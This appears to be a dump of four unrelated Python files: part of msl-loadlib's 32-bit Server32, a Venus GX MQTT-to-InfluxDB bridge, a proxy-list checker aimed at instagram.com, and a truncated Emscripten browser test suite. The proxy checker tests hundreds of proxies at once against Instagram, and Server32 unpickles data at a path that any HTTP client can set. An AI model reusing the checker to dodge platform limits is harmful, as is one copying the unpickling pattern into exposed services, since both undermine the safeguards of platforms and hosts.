32-bit library. See :class:`.LoadLibrary` for more details. libtype : :class:`str` The library type. See :class:`.LoadLibrary` for more details. .. note:: Since Java byte code is executed on the JVM_ it does not make sense to use :class:`Server32` for a Java ``.jar`` or ``.class`` file. host : :class:`str` The IP address of the server. port : :class:`int` The port to run the server on. *args All additional arguments are currently ignored. **kwargs All keyword arguments are passed to :class:`.LoadLibrary`. 
""" self._library = LoadLibrary(path, libtype=libtype, **kwargs) self._assembly = self._library.assembly self._lib = self._library.lib self._path = self._library.path super(Server32, self).__init__((host, int(port)), _RequestHandler) @property def assembly(self): """ Returns a reference to the `.NET Runtime Assembly <NET_>`_ object if the shared library is a .NET Framework otherwise returns :data:`None`. .. tip:: The `JetBrains dotPeek`_ program can be used to reliably decompile any .NET Assembly into the equivalent source code. .. _NET: https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly .. _JetBrains dotPeek: https://www.jetbrains.com/decompiler/ """ return self._assembly @property def lib(self): """Returns the reference to the 32-bit, loaded-library object. For example, if `libtype` is * ``'cdll'`` then a :class:`~ctypes.CDLL` object * ``'windll'`` then a :class:`~ctypes.WinDLL` object * ``'oledll'`` then a :class:`~ctypes.OleDLL` object * ``'net'`` or ``'clr'`` then a :class:`~.load_library.DotNet` object * ``'com'`` or ``'activex'`` then an interface pointer to the COM_ object .. _COM: https://en.wikipedia.org/wiki/Component_Object_Model """ return self._lib @property def path(self): """:class:`str`: The path to the shared library file.""" return self._path @staticmethod def version(): """Gets the version of the Python interpreter that the 32-bit server is running on. Returns ------- :class:`str` The result of executing ``'Python ' + sys.version`` on the 32-bit server. .. invisible-code-block: pycon >>> SKIP_IF_MACOS() Examples -------- :: >>> from msl.loadlib import Server32 >>> Server32.version() 'Python 3.7.10 ...' Note ---- This method takes about 1 second to finish because the 32-bit server needs to start in order to determine the version of the Python interpreter. 
""" exe = os.path.join(os.path.dirname(__file__), SERVER_FILENAME) pipe = subprocess.Popen([exe, '--version'], stdout=subprocess.PIPE) return pipe.communicate()[0].decode().strip() @staticmethod def interactive_console(): """Start an interactive console. This method starts an interactive console, in a new terminal, with the Python interpreter on the 32-bit server. Examples -------- :: >>> from msl.loadlib import Server32 # doctest: +SKIP >>> Server32.interactive_console() # doctest: +SKIP """ exe = os.path.join(os.path.dirname(__file__), SERVER_FILENAME) if IS_WINDOWS: cmd = 'start "msl.loadlib.Server32 || interactive console" "{exe}" --interactive' else: cmd = "gnome-terminal --command='{exe} --interactive'" os.system(cmd.format(exe=exe)) @property def quiet(self): """This attribute is no longer used and it will be removed in a future release. Returns :data:`True`. """ warnings.simplefilter('once', DeprecationWarning) warnings.warn( 'The `quiet` attribute for Server32 will be removed in a future release -- always returns True', DeprecationWarning, stacklevel=2 ) return True @staticmethod def remove_site_packages_64bit(): """Remove the site-packages directory from the 64-bit process. By default the site-packages directory of the 64-bit process is included in :data:`sys.path` of the 32-bit process. Having the 64-bit site-packages directory available can sometimes cause issues. For example, comtypes imports numpy so if numpy is installed in the 64-bit process then comtypes will import the 64-bit version of numpy in the 32-bit process. Depending on the version of Python and/or numpy this can cause the 32-bit server to crash. .. 
versionadded:: 0.9 Examples -------- :: import sys from msl.loadlib import Server32 class FileSystem(Server32): def __init__(self, host, port, **kwargs): # remove the site-packages directory that was passed from 64-bit Python # before calling the super() function to load the COM library path = Server32.remove_site_packages_64bit() super(FileSystem, self).__init__('Scripting.FileSystemObject', 'com', host, port) # optional: add the site-packages directory back into sys.path sys.path.append(path) Returns ------- :class:`str` The path of the site-packages directory that was removed. Can be an empty string if the directory was not found in :data:`sys.path`. """ for index, path in enumerate(sys.path): if path.endswith('site-packages'): return sys.path.pop(index) return '' @staticmethod def is_interpreter(): """Check if code is running on the 32-bit server. If the same module is executed by both :class:`~msl.loadlib.client64.Client64` and :class:`.Server32` then there may be only parts of the code that should be executed by the correct bitness of the Python interpreter. .. versionadded:: 0.9 Returns ------- :class:`bool` Whether the code is running on the 32-bit server. Examples -------- :: import sys from msl.loadlib import Server32 if Server32.is_interpreter(): # this only gets executed on the 32-bit server assert sys.maxsize < 2**32 """ return sys.executable.endswith(SERVER_FILENAME) @staticmethod def examples_dir(): """Get the directory where the example libraries are located. .. versionadded:: 0.9 Returns ------- :class:`str` The directory where the example libraries are located. """ if Server32.is_interpreter(): root = os.path.dirname(sys.executable) else: root = os.path.dirname(__file__) path = os.path.join(root, os.pardir, 'examples', 'loadlib') return os.path.abspath(path) def shutdown_handler(self): """Proxy function that is called immediately prior to the server shutting down. 
The intended use case is for the server to do any necessary cleanup, such as stopping locally started threads or closing file handles before it shuts down. .. versionadded:: 0.6 """ pass class _RequestHandler(BaseHTTPRequestHandler): """Handles a request that was sent to the 32-bit server.""" def do_GET(self): """Handle a GET request.""" try: if self.path == METADATA: response = {'path': self.server.path, 'pid': os.getpid()} else: with open(self.server.pickle_path, mode='rb') as f: args = pickle.load(f) kwargs = pickle.load(f) attr = getattr(self.server, self.path) if callable(attr): response = attr(*args, **kwargs) else: response = attr with open(self.server.pickle_path, mode='wb') as f: pickle.dump(response, f, protocol=self.server.pickle_protocol) self.send_response(OK) self.end_headers() except Exception as e: print('{}: {}'.format(e.__class__.__name__, e)) exc_type, exc_value, exc_traceback = sys.exc_info() tb_list = traceback.extract_tb(exc_traceback) tb = tb_list[min(len(tb_list)-1, 1)] # get the Server32 subclass exception response = {'name': exc_type.__name__, 'value': str(exc_value)} traceback_ = ' File {!r}, line {}, in {}'.format(tb[0], tb[1], tb[2]) if tb[3]: traceback_ += '\n {}'.format(tb[3]) response['traceback'] = traceback_ self.send_response(ERROR) self.end_headers() self.wfile.write(json.dumps(response).encode(encoding='utf-8', errors='ignore')) def do_POST(self): """Handle a POST request.""" if self.path == SHUTDOWN: self.server.shutdown_handler() threading.Thread(target=self.server.shutdown).start() else: # the pickle info match = re.match(r'protocol=(\d+)&path=(.*)', self.path) if match: self.server.pickle_protocol = int(match.group(1)) self.server.pickle_path = match.group(2) code = OK else: code = ERROR self.send_response(code) self.end_headers() def log_message(self, fmt, *args): """ Overrides: :meth:`~http.server.BaseHTTPRequestHandler.log_message` Ignore all log messages from being displayed in :data:`sys.stdout`. """ pass
venus_mqtt_influx.py
""" Module to read Venus GX messages from the dbus MQTT broker and write them to Influx in a format which is easy to process for Grafana monitoring. """ import influxdb import paho.mqtt.client as mqtt from datetime import datetime import json import logging import queue import requests import sys import threading import traceback import time from collections import defaultdict from http.server import HTTPServer, BaseHTTPRequestHandler log = logging.getLogger('mqtt_to_influx') class Stats(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() if hasattr(self.server, 'data'): self.wfile.write(json.dumps(self.server.data).encode()) else: self.wfile.write(json.dumps({"error": "No data defined"})) def log_message(self, format, *args): log.info("%s - %s" % ( self.address_string(), format%args)) class MqttToInflux: def __init__(self, mqtt_host='127.0.0.1', influx_host='127.0.0.1', influx_db='venus', dryrun=False, stats_port=None): self._points = queue.Queue(maxsize=100) self._msg_seen = set() self._stats = { 'msg': { 'count': 0, 'ignored': 0, 'dropped': 0, 'failed': 0, }, 'influx': { 'latency': 0, 'writes': 0, 'failed': 0, }, } self._dryrun = dryrun self._keepalive = set() self._active = True t = threading.Thread(target=self.safe_keepalive) t.daemon = True t.start() t = threading.Thread(target=self.safe_write) t.daemon = True t.start() self._httpd = None if stats_port: server_address = ('', stats_port) self._httpd = HTTPServer(server_address, Stats) self._httpd.data = self._stats t = threading.Thread(target=self._httpd.serve_forever) t.daemon = True t.start() self._influx = influxdb.InfluxDBClient( host=influx_host, port=8086, timeout=5, retries=1) if not self._dryrun: self._influx.create_database(influx_db) self._influx.switch_database(influx_db) self._mqtt = mqtt.Client() self._mqtt.on_connect = self.on_connect self._mqtt.on_disconnect = self.on_disconnect self._mqtt.on_message = 
self.on_message self._mqtt.on_subscribe = self.on_subscribe while self._active: try: self._mqtt.connect(mqtt_host, 1883, 60) self._mqtt.loop_forever() except Exception as e: log.error('MQTT Exception: %s' % type(e)) traceback.print_exc() time.sleep(1) self.quit() def quit(self): self._active = False if self._httpd: self._httpd.shutdown() self._mqtt.disconnect() def on_connect(self, client, userdata, flags, rc): log.info('Connected to mqtt') client.subscribe('N/#') def on_disconnect(self, client, userdata, rc): log.info('Disconnected from mqtt') def on_subscribe(self, client, userdata, flags, rc): log.info('MQTT subscription successful.') def on_message(self, client, userdata, msg): self._stats['msg']['count'] += 1 t = msg.topic p = t.split('/') m = '.'.join(p[4:]) v = json.loads(msg.payload)['value'] if t.endswith('system/0/Serial'): self._keepalive.add(t) # print(t, m, v, type(v)) if type(v) in [float, int, bool]: v = float(v) else: self._stats['msg']['ignored'] += 1 if type(v) == type(None): pass elif t not in self._msg_seen: log.info('Ignoring %s of type %s' % (t, type(v))) self._msg_seen.add(t) else: log.debug('Ignoring %s of type %s' % (t, type(v))) return # print(m, v) point = { "measurement": m, "tags": { "path": p[2], "instanceNumber": p[3], "portalId": p[1] }, "time": datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ'), "fields": { # value # text } } if type(v) == float: v = float(v) # automatic conversion sometimes makes it an int point['fields']['value'] = v elif type(v) == str: point['fields']['text'] = v try: self._points.put(point, block=False) except queue.Full: log.error('Queue full, overload? - dropping all') self._stats['msg']['dropped'] += self._points.qsize() self._points.clear() def safe_keepalive(self): try: self.keepalive() except Exception as e: log.error('Keepalive Exception %s' % e) traceback.print_exc() self.quit() def keepalive(self): # Wait for the first host to appear, to prevent # startup delay. 
while not self._keepalive: time.sleep(.1) n = 0 interval = 30 while self._active: for t in self._keepalive: log.info('Send keepalive to %s' % t) self._mqtt.publish(t) n += 1 if n >= 300/interval: n = 0 # Disconnect a reconnect, which forces # a publish of all values every 5 minutes. self._mqtt.disconnect() time.sleep(interval) def safe_write(self): try: self.write() except Exception as e: log.error('Write Exception %s' % type(e)) traceback.print_exc() self.quit() def write(self): lastwrite = time.time() deduped = 0 points = defaultdict(list) agg = defaultdict(dict) while self._active: now = time.time() try: p = self._points.get(timeout=1) k = p['measurement'] + '.' + p['tags']['path'] + '.' + p['tags']['portalId'] + '.' + p['tags']['instanceNumber'] parts = p['measurement'].split('.') i = None if 'L1' in parts: i = parts.index('L1') if 'L2' in parts: i = parts.index('L2') if 'L3' in parts: i = parts.index('L3') if i is not None: what = parts[i+1] ks = k.replace('L1', 'Lx').replace('L2', 'Lx').replace('L3', 'Lx') # print(ks, what) if what in ('Power', 'Current', 'Voltage', 'Energy', 'I', 'P', 'V'): agg[ks][parts[i]] = p #else: # print('ignored', what, ks) if len(agg[ks]) == 3: ps = p.copy() ps['measurement'] = ps['measurement'].replace('L1', 'Lx').replace('L2', 'Lx').replace('L3', 'Lx') ps['fields']['value'] = sum(v['fields']['value'] for v in agg[ks].values()) if what == 'Voltage' or what == 'V': ps['fields']['value'] /= 3 # print('new sum', ks, what, ps['fields']['value']) points[ks].append(ps) del agg[ks] points[k].append(p) except queue.Empty: pass if now - lastwrite > 10: interval = now - lastwrite lastwrite = now if points: tbw = [] duped = 0 for k, ms in points.items(): # These are sampled on every datapoint if '.Power.' 
in k or 'Dc.0.Current' in k or 'Dc.0.Voltage' in k: tbw += ms continue # Everything else is aggregated to a mean value if ms[0]['fields'].get('value', None) is not None: value = sum(v['fields']['value'] for v in ms) / len(ms) ms[0]['fields']['value'] = value elif ms[0]['fields'].get('text', None) is not None: # Don't need to do anything, just take the first value # TODO(jdi): Should be mode probably. pass duped += len(ms) - 1 tbw.append(ms[0]) log.info('Write %d points (across %d unique measurements), Deduped %d, Interval %.3fs' % ( len(tbw), len(points), duped, interval)) # print(points.keys()) if not self._dryrun: latency = time.time() try: self._influx.write_points(tbw) self._stats['influx']['writes'] += 1 except requests.exceptions.RequestException as e: log.error('Write failure %s, dropping: %d' % (type(e), len(tbw))) self._stats['msg']['failed'] += len(tbw) self._stats['influx']['failed'] += 1 latency = time.time() - latency self._stats['influx']['latency'] = (latency + 9*self._stats['influx']['latency'])/10 log.info('Latency %dms' % (latency*1000)) else: log.debug(' Skip write due to dryrun.') points = defaultdict(list) log.info('Messages handled: %s' % (self._stats['msg'])) def main(): root = logging.getLogger() root.setLevel(logging.INFO) handler = logging.StreamHandler(sys.stdout) handler.setLevel(logging.INFO) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') handler.setFormatter(formatter) root.addHandler(handler) log.info('Starting up') import argparse parser = argparse.ArgumentParser( description='Bridge MQTT messages from Venus GX to Influx DB with some smart sampling..') parser.add_argument('--dryrun', action='store_true', help='do not publish to influx') parser.add_argument('--mqtt_host', help='MQTT host to connect to', default='127.0.0.1') parser.add_argument('--influx_host', help='Influx host to connect to', default='127.0.0.1') parser.add_argument('--influx_db', help='Influx db to connect to', default='venus') 
parser.add_argument('--port', help='Status report port', default=8071) args = parser.parse_args() if args.dryrun: log.warning('Running in dryrun mode') MqttToInflux(mqtt_host=args.mqtt_host, influx_host=args.influx_host, influx_db=args.influx_db, dryrun=args.dryrun, stats_port=args.port) main()
test_proxies.py
'''
Modifier Date: 21/03/2021
Author: AlexxLy
Description: reads a file containing a list of proxies and determines
whether the list is good or not.  Each line of the file must be in the
format ip:port
'''
import platform
from os import system
from time import sleep
from requests import Session
from threading import Thread, RLock

proxy_list = 'proxies.txt'
target_site = 'https://instagram.com'


def get_proxies():
    """Parse ``proxy_list`` into a list of ``{'ip': str, 'port': int}`` dicts.

    Blank lines are skipped; stray ``\\r``/``\\n`` are stripped so a
    trailing newline in the file no longer crashes the ``ip:port`` split.
    """
    proxies = []
    with open(proxy_list, 'rt', encoding='utf-8') as proxies_file:
        for line in proxies_file:
            line = line.strip()  # drop '\n'/'\r'; makes blank-line check work
            if not line:
                continue
            ip, port = line.split(':')
            proxies.append({'ip': ip, 'port': int(port)})
    return proxies


class TestProxies:
    """Concurrently test a list of proxies against ``target_site``."""

    def __init__(self, proxies):
        self.worked = 0
        self.failed = 0
        self.lock = RLock()
        self.active_brs = 0
        self.is_alive = True
        self.proxies = proxies
        self.total = len(proxies)
        self.test_link = target_site

    def display(self):
        """Clear the console and print progress statistics."""
        system('cls' if platform.system() == 'Windows' else 'clear')
        worked, failed, total = self.worked, self.failed, self.total
        worked_per = round((worked / total) * 100, 2)
        failed_per = round((failed / total) * 100, 2)
        complete = round(worked_per + failed_per, 2)
        print(f'Complet: {complete}%')
        print(f'Active la page: {self.active_brs}')
        print(f'Proxies en marche: {worked_per}% [{worked}]')
        print(f'Proxies erreur: {failed_per}% [{failed}]')

    def test_proxy(self, proxy):
        """Attempt one GET through ``proxy``; update the shared counters."""
        br = Session()
        addr = '{}:{}'.format(proxy['ip'], proxy['port'])
        br.proxies.update({'http': addr, 'https': addr})
        try:
            br.get(self.test_link, timeout=(10, 15))
            with self.lock:
                self.worked += 1
        except Exception:
            with self.lock:
                self.failed += 1
        finally:
            br.close()
            with self.lock:
                if self.is_alive:
                    self.display()
                # Always decrement (under the lock), even after stop(),
                # so stop()'s drain loop terminates.
                self.active_brs -= 1

    def start(self):
        """Spawn one daemon thread per proxy, at most 512 at a time."""
        for proxy in self.proxies:
            while self.is_alive and self.active_brs >= 512:
                sleep(0.01)  # yield instead of a 100%-CPU busy-wait
            if not self.is_alive:
                break
            with self.lock:
                self.active_brs += 1
            Thread(target=self.test_proxy, args=[proxy], daemon=True).start()
        while self.is_alive and self.active_brs:
            sleep(0.5)
            self.display()

    def stop(self):
        """Request shutdown and wait for in-flight threads to drain."""
        self.is_alive = False
        while self.active_brs:
            try:
                with self.lock:
                    self.display()
                sleep(0.5)
            except KeyboardInterrupt:
                break

    def examine(self):
        """Print a verdict on the proxy list based on the success ratio."""
        if self.total == 0:
            # Guard: an empty proxies file would otherwise divide by zero.
            print('mauvaise liste de proxy')
            return
        failed = self.failed / self.total
        worked = self.worked / self.total
        if worked == 0:
            print('mauvaise liste de proxy')
        elif (failed - worked) >= 0.1:
            print('mauvaise liste de proxy')
        elif (failed - worked) == 0:
            print('mauvaise liste de proxy')
        else:
            print('Bonne liste de proxy')


if __name__ == '__main__':
    test_proxies = TestProxies(get_proxies())
    try:
        test_proxies.start()
    except KeyboardInterrupt:
        test_proxies.stop()
    finally:
        test_proxies.examine()
test_browser.py
# coding=utf-8 # Copyright 2013 The Emscripten Authors. All rights reserved. # Emscripten is available under two separate licenses, the MIT license and the # University of Illinois/NCSA Open Source License. Both these licenses can be # found in the LICENSE file. import argparse import json import multiprocessing import os import random import shlex import shutil import subprocess import time import unittest import webbrowser import zlib from http.server import BaseHTTPRequestHandler, HTTPServer from pathlib import Path from urllib.request import urlopen from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER from common import read_file, require_v8, also_with_minimal_runtime from tools import shared from tools import ports from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE from tools.shared import try_delete def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port): class ChunkedServerHandler(BaseHTTPRequestHandler): def sendheaders(s, extra=[], length=len(data)): s.send_response(200) s.send_header("Content-Length", str(length)) s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port) s.send_header('Cross-Origin-Resource-Policy', 'cross-origin') s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate') s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges") s.send_header("Content-type", "application/octet-stream") if support_byte_ranges: s.send_header("Accept-Ranges", "bytes") for i in extra: s.send_header(i[0], i[1]) s.end_headers() def do_HEAD(s): s.sendheaders() def do_OPTIONS(s): s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0) def do_GET(s): if s.path == '/': s.sendheaders() elif not support_byte_ranges: s.sendheaders() s.wfile.write(data) else: start, end = s.headers.get("range").split("=")[1].split("-") start = 
int(start) end = int(end) end = min(len(data) - 1, end) length = end - start + 1 s.sendheaders([], length) s.wfile.write(data[start:end + 1]) # CORS preflight makes OPTIONS requests which we need to account for. expectedConns = 22 httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler) for i in range(expectedConns + 1): httpd.handle_request() def also_with_wasmfs(f): def metafunc(self, wasmfs, *args, **kwargs): if wasmfs: self.set_setting('WASMFS') self.emcc_args = self.emcc_args.copy() + ['-DWASMFS'] f(self, *args, **kwargs) else: f(self, *args, **kwargs) metafunc._parameterize = {'': (False,), 'wasmfs': (True,)} return metafunc def also_with_wasm2js(f): assert callable(f) def metafunc(self, with_wasm2js): assert self.get_setting('WASM') is None if with_wasm2js: self.set_setting('WASM', 0) f(self) else: f(self) metafunc._parameterize = {'': (False,), 'wasm2js': (True,)} return metafunc def shell_with_script(shell_file, output_file, replacement): shell = read_file(path_from_root('src', shell_file)) create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement)) def is_chrome(): return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower() def no_chrome(note='chrome is not supported'): if is_chrome(): return unittest.skip(note) return lambda f: f def is_firefox(): return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower() def no_firefox(note='firefox is not supported'): if is_firefox(): return unittest.skip(note) return lambda f: f def no_swiftshader(f): assert callable(f) def decorated(self, *args, **kwargs): if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER: self.skipTest('not compatible with swiftshader') return f(self, *args, **kwargs) return decorated def requires_threads(f): assert callable(f) def decorated(self, *args, **kwargs): if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'): self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set') return f(self, *args, **kwargs) return decorated def also_with_threads(f): def decorated(self, *args, 
**kwargs): f(self) if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'): print('(threads)') self.emcc_args += ['-pthread'] f(self, *args, **kwargs) return decorated requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware") requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware") requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)") requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas") class browser(BrowserCore): @classmethod def setUpClass(cls): super().setUpClass() cls.browser_timeout = 60 if EMTEST_BROWSER != 'node': print() print('Running the browser tests. Make sure the browser allows popups from localhost.') print() def setUp(self): super().setUp() # avoid various compiler warnings that many browser tests currently generate self.emcc_args += [ '-Wno-pointer-sign', '-Wno-int-conversion', ] def test_sdl1_in_emscripten_nonstrict_mode(self): if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']): self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)') # TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once # system JS libraries are no longer automatically linked to anymore. 
self.btest('hello_world_sdl.cpp', reference='htmltest.png') def test_sdl1(self): self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL']) self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL']) # is the default anyhow def test_sdl1_es6(self): self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL', '-sEXPORT_ES6']) # Deliberately named as test_zzz_* to make this test the last one # as this test may take the focus away from the main test window # by opening a new window and possibly not closing it. def test_zzz_html_source_map(self): if not has_browser(): self.skipTest('need a browser') cpp_file = 'src.cpp' html_file = 'src.html' # browsers will try to 'guess' the corresponding original line if a # generated line is unmapped, so if we want to make sure that our # numbering is correct, we need to provide a couple of 'possible wrong # answers'. thus, we add some printf calls so that the cpp file gets # multiple mapped lines. in other words, if the program consists of a # single 'throw' statement, browsers may just map any thrown exception to # that line, because it will be the only mapped line. with open(cpp_file, 'w') as f: f.write(r''' #include <cstdio> int main() { printf("Starting test\n"); try { throw 42; // line 8 } catch (int e) { } printf("done\n"); return 0; } ''') # use relative paths when calling emcc, because file:// URIs can only load # sourceContent when the maps are relative paths try_delete(html_file) try_delete(html_file + '.map') self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map']) self.assertExists(html_file) self.assertExists('src.wasm.map') webbrowser.open_new('file://' + html_file) print(''' If manually bisecting: Check that you see src.cpp among the page sources. Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with --save-dir for the reload). 
''') def test_emscripten_log(self): self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'), args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map']) @also_with_wasmfs def test_preload_file(self): create_file('somefile.txt', 'load me right before running the code please') create_file('.somefile.txt', 'load me right before running the code please') create_file('some@file.txt', 'load me right before running the code please') absolute_src_path = os.path.abspath('somefile.txt') def make_main(path): print('make main at', path) path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string. # TODO: change this when wasmfs supports relative paths. if self.get_setting('WASMFS'): path = "/" + path create_file('main.cpp', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); assert(strcmp("load me right before", buf) == 0); return 0; } ''' % path) test_cases = [ # (source preload-file string, file on target FS to load) ("somefile.txt", "somefile.txt"), (".somefile.txt@somefile.txt", "somefile.txt"), ("./somefile.txt", "somefile.txt"), ("somefile.txt@file.txt", "file.txt"), ("./somefile.txt@file.txt", "file.txt"), ("./somefile.txt@./file.txt", "file.txt"), ("somefile.txt@/file.txt", "file.txt"), ("somefile.txt@/", "somefile.txt"), (absolute_src_path + "@file.txt", "file.txt"), (absolute_src_path + "@/file.txt", "file.txt"), (absolute_src_path + "@/", "somefile.txt"), ("somefile.txt@/directory/file.txt", "/directory/file.txt"), ("somefile.txt@/directory/file.txt", "directory/file.txt"), (absolute_src_path + "@/directory/file.txt", "directory/file.txt"), ("some@@file.txt@other.txt", "other.txt"), ("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")] for srcpath, dstpath in test_cases: print('Testing', srcpath, dstpath) 
make_main(dstpath) self.btest_exit('main.cpp', args=['--preload-file', srcpath]) if WINDOWS: # On Windows, the following non-alphanumeric non-control code ASCII characters are supported. # The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those. tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt' else: # All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed. tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt' create_file(tricky_filename, 'load me right before running the code please') make_main(tricky_filename) # As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation. self.btest_exit('main.cpp', args=['--preload-file', tricky_filename.replace('@', '@@')]) # TODO: WASMFS doesn't support the rest of this test yet. Exit early. if self.get_setting('WASMFS'): return # By absolute path make_main('somefile.txt') # absolute becomes relative self.btest_exit('main.cpp', args=['--preload-file', absolute_src_path]) # Test subdirectory handling with asset packaging. try_delete('assets') ensure_dir('assets/sub/asset1/'.replace('\\', '/')) ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist. 
ensure_dir('assets/sub/asset2/'.replace('\\', '/')) create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''') create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''') create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''') absolute_assets_src_path = 'assets'.replace('\\', '/') def make_main_two_files(path1, path2, nonexistingpath): create_file('main.cpp', r''' #include <stdio.h> #include <assert.h> #include <string.h> #include <emscripten.h> int main() { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); assert(strcmp("load me right before", buf) == 0); f = fopen("%s", "r"); assert(f != NULL); fclose(f); f = fopen("%s", "r"); assert(f == NULL); return 0; } ''' % (path1, path2, nonexistingpath)) test_cases = [ # (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS) ("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"), ("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"), ("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"), ("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"), ("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"), (absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"), (absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")] for test in test_cases: (srcpath, dstpath1, dstpath2, nonexistingpath) = test 
make_main_two_files(dstpath1, dstpath2, nonexistingpath) print(srcpath) self.btest_exit('main.cpp', args=['--preload-file', srcpath, '--exclude-file', '*/.*']) # Should still work with -o subdir/.. make_main('somefile.txt') # absolute becomes relative ensure_dir('dirrey') self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'], reporting=Reporting.JS_ONLY) self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?exit:0') # With FS.preloadFile create_file('pre.js', ''' Module.preRun = function() { FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this. }; ''') make_main('someotherfile.txt') self.btest_exit('main.cpp', args=['--pre-js', 'pre.js', '--use-preload-plugins']) # Tests that user .html shell files can manually download .data files created with --preload-file cmdline. @parameterized({ 'default': ([],), 'pthreads': (['-pthread', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME'],), }) @requires_threads def test_preload_file_with_manual_data_download(self, args): src = test_file('manual_download_data.cpp') create_file('file.txt', '''Hello!''') self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'] + args) shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html') # Move .data file out of server root to ensure that getPreloadedPackage is actually used os.mkdir('test') shutil.move('manual_download_data.data', 'test/manual_download_data.data') self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1') # Tests that if the output files have single or double quotes in them, that it will be handled by # correctly escaping the names. def test_output_file_escaping(self): self.set_setting('EXIT_RUNTIME') tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. 
